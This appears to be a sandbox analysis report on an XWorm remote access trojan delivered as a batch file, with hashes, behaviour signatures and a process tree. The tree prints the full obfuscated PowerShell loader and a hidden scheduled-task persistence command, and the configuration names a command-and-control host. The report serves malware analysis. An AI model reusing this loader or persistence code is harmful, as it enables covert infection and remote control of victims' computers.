xworm | e23da97c5d776707b4046939c55bbce60d51f81ee44d85932c5a0495e29edaac

Analysis

max time kernel
34s
max time network
36s
platform
windows10-2004_x64
resource
win10v2004-20250217-en
resource tags

arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
submitted
08/03/2025, 20:08

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

sigam.bat
Size

305KB
MD5

fc8cfb6ec385f5fb6562cd9743b6e779
SHA1

f8a2ad10335e6980e454890fe87fc05e0c7e8eff
SHA256

e23da97c5d776707b4046939c55bbce60d51f81ee44d85932c5a0495e29edaac
SHA512

204157ffe9d000a861d34bf72578485c10ffa507a4aeae9921fb87939782beadfc106e64511ba43b9ca1a0789d9e951626d515ac1f46567f2e27f5115e2b4d31
SSDEEP

6144:FKUweZmklFrB429lxBm0yX+EDNmHiBqNrTHR2XuGHSlGvUVPm8fCk:4URvrBDG0n6NEiBg2XlHS4vUVPJ

Score

10^/10

xworm execution rat trojan

Malware Config

Extracted

Family

xworm

if-eventually.gl.at.ply.gg:17094

Attributes

Install_directory
%Temp%
install_file
Sigam.exe

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral2/memory/4432-49-0x000002304EE80000-0x000002304EE9A000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 1 IoCs

flow	pid	Process
30	4432	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4432	powershell.exe
3712	powershell.exe
2236	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation	WScript.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
29	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings	powershell.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
3712	powershell.exe
3712	powershell.exe
2236	powershell.exe
2236	powershell.exe
4432	powershell.exe
4432	powershell.exe
4432	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3712	powershell.exe
Token: SeDebugPrivilege	2236	powershell.exe
Token: SeIncreaseQuotaPrivilege	2236	powershell.exe
Token: SeSecurityPrivilege	2236	powershell.exe
Token: SeTakeOwnershipPrivilege	2236	powershell.exe
Token: SeLoadDriverPrivilege	2236	powershell.exe
Token: SeSystemProfilePrivilege	2236	powershell.exe
Token: SeSystemtimePrivilege	2236	powershell.exe
Token: SeProfSingleProcessPrivilege	2236	powershell.exe
Token: SeIncBasePriorityPrivilege	2236	powershell.exe
Token: SeCreatePagefilePrivilege	2236	powershell.exe
Token: SeBackupPrivilege	2236	powershell.exe
Token: SeRestorePrivilege	2236	powershell.exe
Token: SeShutdownPrivilege	2236	powershell.exe
Token: SeDebugPrivilege	2236	powershell.exe
Token: SeSystemEnvironmentPrivilege	2236	powershell.exe
Token: SeRemoteShutdownPrivilege	2236	powershell.exe
Token: SeUndockPrivilege	2236	powershell.exe
Token: SeManageVolumePrivilege	2236	powershell.exe
Token: 33	2236	powershell.exe
Token: 34	2236	powershell.exe
Token: 35	2236	powershell.exe
Token: 36	2236	powershell.exe
Token: SeIncreaseQuotaPrivilege	2236	powershell.exe
Token: SeSecurityPrivilege	2236	powershell.exe
Token: SeTakeOwnershipPrivilege	2236	powershell.exe
Token: SeLoadDriverPrivilege	2236	powershell.exe
Token: SeSystemProfilePrivilege	2236	powershell.exe
Token: SeSystemtimePrivilege	2236	powershell.exe
Token: SeProfSingleProcessPrivilege	2236	powershell.exe
Token: SeIncBasePriorityPrivilege	2236	powershell.exe
Token: SeCreatePagefilePrivilege	2236	powershell.exe
Token: SeBackupPrivilege	2236	powershell.exe
Token: SeRestorePrivilege	2236	powershell.exe
Token: SeShutdownPrivilege	2236	powershell.exe
Token: SeDebugPrivilege	2236	powershell.exe
Token: SeSystemEnvironmentPrivilege	2236	powershell.exe
Token: SeRemoteShutdownPrivilege	2236	powershell.exe
Token: SeUndockPrivilege	2236	powershell.exe
Token: SeManageVolumePrivilege	2236	powershell.exe
Token: 33	2236	powershell.exe
Token: 34	2236	powershell.exe
Token: 35	2236	powershell.exe
Token: 36	2236	powershell.exe
Token: SeIncreaseQuotaPrivilege	2236	powershell.exe
Token: SeSecurityPrivilege	2236	powershell.exe
Token: SeTakeOwnershipPrivilege	2236	powershell.exe
Token: SeLoadDriverPrivilege	2236	powershell.exe
Token: SeSystemProfilePrivilege	2236	powershell.exe
Token: SeSystemtimePrivilege	2236	powershell.exe
Token: SeProfSingleProcessPrivilege	2236	powershell.exe
Token: SeIncBasePriorityPrivilege	2236	powershell.exe
Token: SeCreatePagefilePrivilege	2236	powershell.exe
Token: SeBackupPrivilege	2236	powershell.exe
Token: SeRestorePrivilege	2236	powershell.exe
Token: SeShutdownPrivilege	2236	powershell.exe
Token: SeDebugPrivilege	2236	powershell.exe
Token: SeSystemEnvironmentPrivilege	2236	powershell.exe
Token: SeRemoteShutdownPrivilege	2236	powershell.exe
Token: SeUndockPrivilege	2236	powershell.exe
Token: SeManageVolumePrivilege	2236	powershell.exe
Token: 33	2236	powershell.exe
Token: 34	2236	powershell.exe
Token: 35	2236	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 4784 wrote to memory of 4716	4784	cmd.exe	87
PID 4784 wrote to memory of 4716	4784	cmd.exe	87
PID 4716 wrote to memory of 3860	4716	net.exe	88
PID 4716 wrote to memory of 3860	4716	net.exe	88
PID 4784 wrote to memory of 3712	4784	cmd.exe	92
PID 4784 wrote to memory of 3712	4784	cmd.exe	92
PID 3712 wrote to memory of 2236	3712	powershell.exe	95
PID 3712 wrote to memory of 2236	3712	powershell.exe	95
PID 3712 wrote to memory of 4848	3712	powershell.exe	97
PID 3712 wrote to memory of 4848	3712	powershell.exe	97
PID 4848 wrote to memory of 4484	4848	WScript.exe	98
PID 4848 wrote to memory of 4484	4848	WScript.exe	98
PID 4484 wrote to memory of 4952	4484	cmd.exe	100
PID 4484 wrote to memory of 4952	4484	cmd.exe	100
PID 4952 wrote to memory of 4780	4952	net.exe	101
PID 4952 wrote to memory of 4780	4952	net.exe	101
PID 4484 wrote to memory of 4432	4484	cmd.exe	104
PID 4484 wrote to memory of 4432	4484	cmd.exe	104

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\sigam.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4784
- C:\Windows\system32\net.exe
  net file
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4716
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 file
    3⤵
    PID:3860
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('c0bpBcIu6584bY65H+UdteQkyxdnjH+EmhZQ2yerru0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('T7fYeSkMAr1iBCnxhLM7rg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dpDNc=New-Object System.IO.MemoryStream(,$param_var); $gyjib=New-Object System.IO.MemoryStream; $efwce=New-Object System.IO.Compression.GZipStream($dpDNc, [IO.Compression.CompressionMode]::Decompress); $efwce.CopyTo($gyjib); $efwce.Dispose(); $dpDNc.Dispose(); $gyjib.Dispose(); $gyjib.ToArray();}function execute_function($param_var,$param2_var){ $HkCLb=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tHnkt=$HkCLb.EntryPoint; $tHnkt.Invoke($null, $param2_var);}$voztH = 'C:\Users\Admin\AppData\Local\Temp\sigam.bat';$host.UI.RawUI.WindowTitle = $voztH;$eEkrc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($voztH).Split([Environment]::NewLine);foreach ($SLVzD in $eEkrc) { if ($SLVzD.StartsWith(':: ')) { $JwMvU=$SLVzD.Substring(3); break; }}$payloads_var=[string[]]$JwMvU.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3712
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_614_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_614.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2236
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_614.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:4848
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_614.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4484
    - - C:\Windows\system32\net.exe
        
        net file
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4952
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        6⤵
        
        PID:4780
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('c0bpBcIu6584bY65H+UdteQkyxdnjH+EmhZQ2yerru0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('T7fYeSkMAr1iBCnxhLM7rg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dpDNc=New-Object System.IO.MemoryStream(,$param_var); $gyjib=New-Object System.IO.MemoryStream; $efwce=New-Object System.IO.Compression.GZipStream($dpDNc, [IO.Compression.CompressionMode]::Decompress); $efwce.CopyTo($gyjib); $efwce.Dispose(); $dpDNc.Dispose(); $gyjib.Dispose(); $gyjib.ToArray();}function execute_function($param_var,$param2_var){ $HkCLb=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tHnkt=$HkCLb.EntryPoint; $tHnkt.Invoke($null, $param2_var);}$voztH = 'C:\Users\Admin\AppData\Roaming\startup_str_614.bat';$host.UI.RawUI.WindowTitle = $voztH;$eEkrc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($voztH).Split([Environment]::NewLine);foreach ($SLVzD in $eEkrc) { if ($SLVzD.StartsWith(':: ')) { $JwMvU=$SLVzD.Substring(3); break; }}$payloads_var=[string[]]$JwMvU.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4432

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
661739d384d9dfd807a089721202900b

SHA1
5b2c5d6a7122b4ce849dc98e79a7713038feac55

SHA256
70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

SHA512
81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
dbbf71e9fb59f80938f09809b160e441

SHA1
8b9a517d846cb9a0a284f77ed88328236a85055f

SHA256
e1de59d46c7c47af2d62f7754524b080a706be6b38d55a03733a10c3675598b1

SHA512
90b75d43ddb81c710fb8fe2fd15b5c05181c774d3f401e47862006adb1703bc65ad8fead4aaf7a28b8e2bbe7249f3de998bd9432c1e62fa8718a19dacc4b8840

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pbc4w0ho.pd0.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_614.bat

Filesize
305KB

MD5
fc8cfb6ec385f5fb6562cd9743b6e779

SHA1
f8a2ad10335e6980e454890fe87fc05e0c7e8eff

SHA256
e23da97c5d776707b4046939c55bbce60d51f81ee44d85932c5a0495e29edaac

SHA512
204157ffe9d000a861d34bf72578485c10ffa507a4aeae9921fb87939782beadfc106e64511ba43b9ca1a0789d9e951626d515ac1f46567f2e27f5115e2b4d31

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_614.vbs

Filesize
115B

MD5
49590a405edbbcde546c83fea7a042bd

SHA1
bba0f1c5957598d464b3903251dd6a02388bbb1d

SHA256
62c7142a915e502032aac9160e738e7d730a5c87be982d34deeba4387e776895

SHA512
b752358776ba80886e16a63fd7714d5817e10d5faa676af1cf9969ca25669a85279312e0f5f3fbdc10cf4822eaa747669eae858f589c18604c3d6547370ac5cc

Download Submit
memory/2236-26-0x00007FF952F30000-0x00007FF9539F1000-memory.dmp

Filesize
10.8MB

Download
memory/2236-16-0x00007FF952F30000-0x00007FF9539F1000-memory.dmp

Filesize
10.8MB

Download
memory/2236-27-0x00007FF952F30000-0x00007FF9539F1000-memory.dmp

Filesize
10.8MB

Download
memory/2236-30-0x00007FF952F30000-0x00007FF9539F1000-memory.dmp

Filesize
10.8MB

Download
memory/3712-14-0x000001E461250000-0x000001E46128A000-memory.dmp

Filesize
232KB

Download
memory/3712-0-0x00007FF952F33000-0x00007FF952F35000-memory.dmp

Filesize
8KB

Download
memory/3712-13-0x000001E461220000-0x000001E461228000-memory.dmp

Filesize
32KB

Download
memory/3712-12-0x00007FF952F30000-0x00007FF9539F1000-memory.dmp

Filesize
10.8MB

Download
memory/3712-11-0x00007FF952F30000-0x00007FF9539F1000-memory.dmp

Filesize
10.8MB

Download
memory/3712-3-0x000001E460FD0000-0x000001E460FF2000-memory.dmp

Filesize
136KB

Download
memory/3712-50-0x00007FF952F30000-0x00007FF9539F1000-memory.dmp

Filesize
10.8MB

Download
memory/4432-49-0x000002304EE80000-0x000002304EE9A000-memory.dmp

Filesize
104KB

Download